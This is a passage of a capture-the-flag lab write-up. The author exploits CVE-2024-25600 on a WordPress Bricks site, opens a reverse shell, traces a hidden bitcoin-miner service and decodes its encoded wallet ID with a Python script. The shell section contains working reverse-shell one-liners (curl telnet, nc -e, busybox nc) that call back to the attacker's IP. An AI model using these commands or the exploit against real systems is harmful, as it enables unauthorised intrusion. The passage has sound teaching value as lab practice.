2024-05-04 10:23:59 (50.4 KB/s) - ‘main.zip’ saved [5411]

                                                                                                         
┌──(kali㉿kali)-[~]
└─$ unzip main.zip 
Archive:  main.zip
19e80ce8c448bccc2fcca161ebf76db569a14b19
   creating: CVE-2024-25600-main/
  inflating: CVE-2024-25600-main/README.md  
  inflating: CVE-2024-25600-main/exploit.py  
 extracting: CVE-2024-25600-main/requirements.txt  
                                                                                                         
┌──(kali㉿kali)-[~]
└─$ cd CVE-2024-25600-main/ 
                                                                                                         
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python -m venv venv
                                                                                                         
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ source venv/bin/activate
                                                                                                         
┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ pip install -r requirements.txt 
Collecting alive_progress (from -r requirements.txt (line 1))
  Downloading alive_progress-3.1.5-py3-none-any.whl.metadata (68 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 68.4/68.4 kB 136.8 kB/s eta 0:00:00
Collecting bs4 (from -r requirements.txt (line 2))
  Downloading bs4-0.0.2-py2.py3-none-any.whl.metadata (411 bytes)
Collecting prompt_toolkit (from -r requirements.txt (line 3))
  Downloading prompt_toolkit-3.0.43-py3-none-any.whl.metadata (6.5 kB)
Collecting requests (from -r requirements.txt (line 4))
  Downloading requests-2.31.0-py3-none-any.whl.metadata (4.6 kB)
Collecting rich (from -r requirements.txt (line 5))
  Downloading rich-13.7.1-py3-none-any.whl.metadata (18 kB)
Collecting about-time==4.2.1 (from alive_progress->-r requirements.txt (line 1))
  Downloading about_time-4.2.1-py3-none-any.whl.metadata (13 kB)
Collecting grapheme==0.6.0 (from alive_progress->-r requirements.txt (line 1))
  Downloading grapheme-0.6.0.tar.gz (207 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 207.3/207.3 kB 14.0 kB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Collecting beautifulsoup4 (from bs4->-r requirements.txt (line 2))
  Downloading beautifulsoup4-4.12.3-py3-none-any.whl.metadata (3.8 kB)
Collecting wcwidth (from prompt_toolkit->-r requirements.txt (line 3))
  Downloading wcwidth-0.2.13-py2.py3-none-any.whl.metadata (14 kB)
Collecting charset-normalizer<4,>=2 (from requests->-r requirements.txt (line 4))
  Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (33 kB)
Collecting idna<4,>=2.5 (from requests->-r requirements.txt (line 4))
  Downloading idna-3.7-py3-none-any.whl.metadata (9.9 kB)
Collecting urllib3<3,>=1.21.1 (from requests->-r requirements.txt (line 4))
  Downloading urllib3-2.2.1-py3-none-any.whl.metadata (6.4 kB)
Collecting certifi>=2017.4.17 (from requests->-r requirements.txt (line 4))
  Downloading certifi-2024.2.2-py3-none-any.whl.metadata (2.2 kB)
Collecting markdown-it-py>=2.2.0 (from rich->-r requirements.txt (line 5))
  Downloading markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich->-r requirements.txt (line 5))
  Downloading pygments-2.17.2-py3-none-any.whl.metadata (2.6 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich->-r requirements.txt (line 5))
  Downloading mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Collecting soupsieve>1.2 (from beautifulsoup4->bs4->-r requirements.txt (line 2))
  Downloading soupsieve-2.5-py3-none-any.whl.metadata (4.7 kB)
Downloading alive_progress-3.1.5-py3-none-any.whl (75 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 76.0/76.0 kB 17.6 kB/s eta 0:00:00
Downloading about_time-4.2.1-py3-none-any.whl (13 kB)
Downloading bs4-0.0.2-py2.py3-none-any.whl (1.2 kB)
Downloading prompt_toolkit-3.0.43-py3-none-any.whl (386 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 386.1/386.1 kB 23.7 kB/s eta 0:00:00
Downloading requests-2.31.0-py3-none-any.whl (62 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 62.6/62.6 kB 24.0 kB/s eta 0:00:00
Downloading rich-13.7.1-py3-none-any.whl (240 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 240.7/240.7 kB 16.7 kB/s eta 0:00:00
Downloading certifi-2024.2.2-py3-none-any.whl (163 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 163.8/163.8 kB 12.8 kB/s eta 0:00:00
Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (140 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 140.3/140.3 kB 18.8 kB/s eta 0:00:00
Downloading idna-3.7-py3-none-any.whl (66 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 66.8/66.8 kB 18.3 kB/s eta 0:00:00
Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 87.5/87.5 kB 23.3 kB/s eta 0:00:00
Downloading pygments-2.17.2-py3-none-any.whl (1.2 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 18.2 kB/s eta 0:00:00
Downloading urllib3-2.2.1-py3-none-any.whl (121 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 121.1/121.1 kB 16.1 kB/s eta 0:00:00
Downloading beautifulsoup4-4.12.3-py3-none-any.whl (147 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 147.9/147.9 kB 18.6 kB/s eta 0:00:00
Downloading wcwidth-0.2.13-py2.py3-none-any.whl (34 kB)
Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Downloading soupsieve-2.5-py3-none-any.whl (36 kB)
Building wheels for collected packages: grapheme
  Building wheel for grapheme (pyproject.toml) ... done
  Created wheel for grapheme: filename=grapheme-0.6.0-py3-none-any.whl size=210078 sha256=fbdc53ce28a739bd023fe2fa13724076906e82c58d137536e74b64655a175a8d
  Stored in directory: /home/kali/.cache/pip/wheels/ee/3b/0b/1b865800e916d671a24028d884698674138632a83fdfad4926
Successfully built grapheme
Installing collected packages: wcwidth, grapheme, urllib3, soupsieve, pygments, prompt_toolkit, mdurl, idna, charset-normalizer, certifi, about-time, requests, markdown-it-py, beautifulsoup4, alive_progress, rich, bs4
Successfully installed about-time-4.2.1 alive_progress-3.1.5 beautifulsoup4-4.12.3 bs4-0.0.2 certifi-2024.2.2 charset-normalizer-3.3.2 grapheme-0.6.0 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 prompt_toolkit-3.0.43 pygments-2.17.2 requests-2.31.0 rich-13.7.1 soupsieve-2.5 urllib3-2.2.1 wcwidth-0.2.13

┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python exploit.py -u https://bricks.thm
[*] Nonce found: 964a6e9b87
[+] https://bricks.thm is vulnerable to CVE-2024-25600. Command output: apache
[!] Shell is ready, please type your commands UwU
# whoami
apache    
      
# C='curl -Ns telnet://10.11.85.12:9001'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null
[-] No valid response received or target not vulnerable.
# whoami
apache 

# nc 10.11.85.12 9001 -e sh
[-] No valid response received or target not vulnerable.
# busybox nc 10.11.85.12 9001 -e sh
```

```
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.239.202] 55846
whoami
apache
python -c 'import pty;pty.spawn("/bin/bash")'
apache@tryhackme:/data/www/default$ 
```

## 4 - Looking around

We are supposed to find the name of a suspicious process. `ps aux` does not give anything useful. Listing systemd units does, however (grepping because the full output is too long):

```
apache@tryhackme:/data/www/default$ systemctl | grep TRYHACK
systemctl | grep TRYHACK
  ubuntu.service                                   loaded active     running   TRYHACK3M
```

That gives the name of a unit, not the process it runs; `systemctl status` shows the main PID and the binary behind it:

```
apache@tryhackme:/data/www/default$ systemctl status ubuntu.service
systemctl status ubuntu.service
● ubuntu.service - TRYHACK3M
     Loaded: loaded (/etc/systemd/system/ubuntu.service; enabled; vendor preset: enabled)
     Active: active (running) since Sat 2024-05-04 07:42:43 UTC; 3min 27s ago
   Main PID: 2739 (nm-inet-dialog)
      Tasks: 2 (limit: 4671)
     Memory: 30.6M
     CGroup: /system.slice/ubuntu.service
             ├─2739 /lib/NetworkManager/nm-inet-dialog
             └─2740 /lib/NetworkManager/nm-inet-dialog
```

## 5 - Digging into the miner

```
apache@tryhackme:/lib/NetworkManager$ systemctl list-unit-files ubuntu.service
<rkManager$ systemctl list-unit-files ubuntu.service
 UNIT FILE      STATE   VENDOR PRESET
ubuntu.service enabled enabled      

1 unit files listed.
apache@tryhackme:/lib/NetworkManager$ ls
 ls
VPN		nm-dispatcher		nm-openvpn-service
conf.d		nm-iface-helper		nm-openvpn-service-openvpn-helper
dispatcher.d	nm-inet-dialog		nm-pptp-auth-dialog
inet.conf	nm-initrd-generator	nm-pptp-service
nm-dhcp-helper	nm-openvpn-auth-dialog	system-connections
apache@tryhackme:/lib/NetworkManager$ head inet.conf
head inet.conf
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
2024-04-08 10:46:08,745 [*] Miner()
2024-04-08 10:46:08,745 [*] Bitcoin Miner Thread Started
2024-04-08 10:46:08,745 [*] Status: Mining!
2024-04-08 10:46:10,747 [*] Miner()
2024-04-08 10:46:12,748 [*] Miner()
2024-04-08 10:46:14,751 [*] Miner()
2024-04-08 10:46:16,753 [*] Miner()
apache@tryhackme:/lib/NetworkManager$ 
```

<figure><img src="/files/hC3zDo1eyn83z5rhbGSt" alt=""><figcaption><p>A Bitcoin wallet address!</p></figcaption></figure>
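
The `ID:` line in `inet.conf` is a wallet address wrapped in several encoding layers. The following is an added example, not part of the original writeup, that peels those layers programmatically instead of pasting the value into a decoder: `INET_CONF_ID` is the ID value from the `head inet.conf` output above; the layer detection (try hex, then strict base64, stop once the output is no longer printable text or decodes no further) and the `BECH32_RE` extractor are my own heuristics, written for this example.

```python
"""Peel the encoding layers off the ID value in inet.conf.

Added example, not from the original writeup. The hex string below is the
ID value shown in the writeup's `head inet.conf` output.
"""
import base64
import binascii
import re

INET_CONF_ID = (
    "5757314e65474e5962484a4f656d787457544e424e574648555446684d307073"
    "5930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77"
    "546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531"
    "595564476130355864486c6157454a3557544a564e453959556e4a685246497a"
    "5932355363303948526a4a6b52464a7a546d706b65466c525054303d"
)

HEX_RE = re.compile(r"\A[0-9a-fA-F]+\Z")
B64_RE = re.compile(r"\A[A-Za-z0-9+/]+={0,2}\Z")
# Bech32 data charset (no 1, b, i, o) after the bc1 prefix. Real addresses
# carry 39 (P2WPKH) to 59 (P2WSH/P2TR) data characters; the range is kept a
# little wider so a mangled copy is still surfaced for review.
BECH32_RE = re.compile(r"bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38,60}")


def _decode_once(text):
    """One layer: hex if it looks like hex, else strict base64, else nothing.

    Hex is tried first, so a base64 string made only of hex characters would
    be misread; that is the known blind spot of this heuristic.
    """
    if len(text) % 2 == 0 and HEX_RE.match(text):
        return "hex", bytes.fromhex(text)
    if len(text) % 4 == 0 and B64_RE.match(text):
        try:
            return "base64", base64.b64decode(text, validate=True)
        except binascii.Error:
            return None
    return None


def peel(text, max_layers=8):
    """Decode layer by layer; return (layers applied, final text)."""
    layers = []
    current = text.strip()
    for _ in range(max_layers):
        step = _decode_once(current)
        if step is None:
            break
        kind, raw = step
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            break
        if not all(c.isprintable() or c in "\r\n\t" for c in decoded):
            break
        layers.append(kind)
        current = decoded
    return layers, current


def find_bech32(text):
    """Pull every bc1... candidate out of the decoded text."""
    return BECH32_RE.findall(text)


if __name__ == "__main__":
    layers, plain = peel(INET_CONF_ID)
    print("layers:", " -> ".join(layers))
    for addr in find_bech32(plain):
        print(addr)
```

On this ID the layers come off as hex, then base64 twice, and the result is not one address but two bech32 strings back to back that differ in a single character, which is why the extractor returns a list rather than a single match; check both against the block explorer rather than assuming the first one is the miner's wallet.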

